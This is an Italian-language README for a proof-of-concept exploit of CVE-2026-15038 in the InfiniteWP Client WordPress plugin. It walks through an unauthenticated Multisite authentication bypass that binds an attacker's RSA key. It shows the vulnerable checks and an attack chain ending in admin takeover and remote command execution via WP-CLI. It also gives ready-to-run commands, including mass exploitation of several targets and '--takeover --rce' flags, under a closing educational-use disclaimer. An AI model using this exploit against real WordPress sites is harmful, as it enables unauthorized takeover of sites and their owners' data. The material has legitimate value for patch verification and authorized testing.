
PoC exploit per CVE-2026-15038 nel plugin WordPress InfiniteWP Client: bypassa l'autenticazione su Multisite, associa la chiave RSA dell'attaccante, scala fino alla compromissione dell'admin ed esegue comandi remoti tramite WP-CLI.
Compromissione dell'account admin senza autenticazione in WordPress Multisite
Il plugin InfiniteWP Client per WordPress (< 1.13.6) contiene una vulnerabilità critica di bypass dell'autenticazione che colpisce le installazioni Multisite.
Un attaccante non autenticato può:
if (!$iwp_mmb_core->get_option('iwp_client_action_message_id')
&& !$iwp_mmb_core->get_option('iwp_client_public_key'))
get_site_option() → legge dal livello di rete (wp_sitemeta)update_blog_option() → scrive a livello di singolo blog (wp_X_options)💥 Risultato: Su Multisite, il controllo restituisce sempre false — la ri-associazione è sempre consentita.
if(trim($activation_key) != get_option('iwp_client_activate_key')){
get_option() restituisce falseactivation_key → trim(null) → '''' != false → false → Il controllo viene superato 🎯openssl_verify() ha esito positivograph LR
A[Send POST Request] --> B[Add Site Action]
B --> C[Guard Bypassed]
C --> D[Activation Key Check Fails]
D --> E[Signature Verifies]
E --> F[Attacker Key Bound]
F --> G[Full Admin Access]
G --> H[RCE Achieved]
# Clone the repository
git clone https://github.com/yourusername/CVE-2026-15038.git
cd CVE-2026-15038
# Install dependencies
pip install -r requirements.txt
python3 exploit.py -t https://wordpress.ddev.site
python3 exploit.py -t https://target1.com -t https://target2.com -t https://target3.com
python3 exploit.py -t https://wordpress.ddev.site --command "wp plugin install hello-dolly --activate"
python3 exploit.py -t https://wordpress.ddev.site --takeover --rce
| File | Descrizione |
|---|---|
exploit.py | 🐍 Script exploit principale con supporto allo sfruttamento di massa |
requirements.txt | 📦 Dipendenze Python |
README.md | 📖 Questa documentazione |
add_site nei logQuesto strumento è destinato esclusivamente a scopi educativi e di test di sicurezza. Utilizzalo solo su sistemi di tua proprietà o per i quali hai ricevuto esplicita autorizzazione a effettuare test. Gli autori non si assumono alcuna responsabilità per un uso improprio.